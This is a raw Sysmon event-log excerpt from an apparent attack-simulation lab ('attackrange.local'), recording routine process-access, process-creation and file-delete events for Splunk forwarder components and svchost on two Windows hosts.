07:54:33.155{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082083Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:33.155{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082082Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:33.155{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082081Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:33.155{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082080Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:33.155{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082079Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:33.155{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082078Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:33.155{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082077Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:33.155{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082076Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:33.155{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B339-615A-6001-00000000FD01}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082075Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:33.155{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B339-615A-6001-00000000FD01}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082074Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:33.155{2FDD8D40-B339-615A-6001-00000000FD01}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000082104Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.936{2FDD8D40-B33A-615A-6101-00000000FD01}40562396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082103Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.780{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B33A-615A-6101-00000000FD01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082102Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.780{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082101Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.780{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082100Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.780{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082099Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.780{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082098Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.780{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082097Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.780{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082096Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.780{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082095Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.780{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082094Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.780{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082093Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.780{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B33A-615A-6101-00000000FD01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082092Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.780{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B33A-615A-6101-00000000FD01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082091Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.780{2FDD8D40-B33A-615A-6101-00000000FD01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082090Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.295{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C731C46A6B6FAF10DFE52CA7FF685D99,SHA256=C8FF655EACD2194D23C0C0252464028151838671B93ED1CD82BC36D6682AA7EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104231Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:34.282{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F634FE5A3115417A03BBC1EA0E312141,SHA256=32F973D40E1CED921D019C433CE5943467F24B0754E8FCD2FF0EF0A68D8328A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082089Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:34.155{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 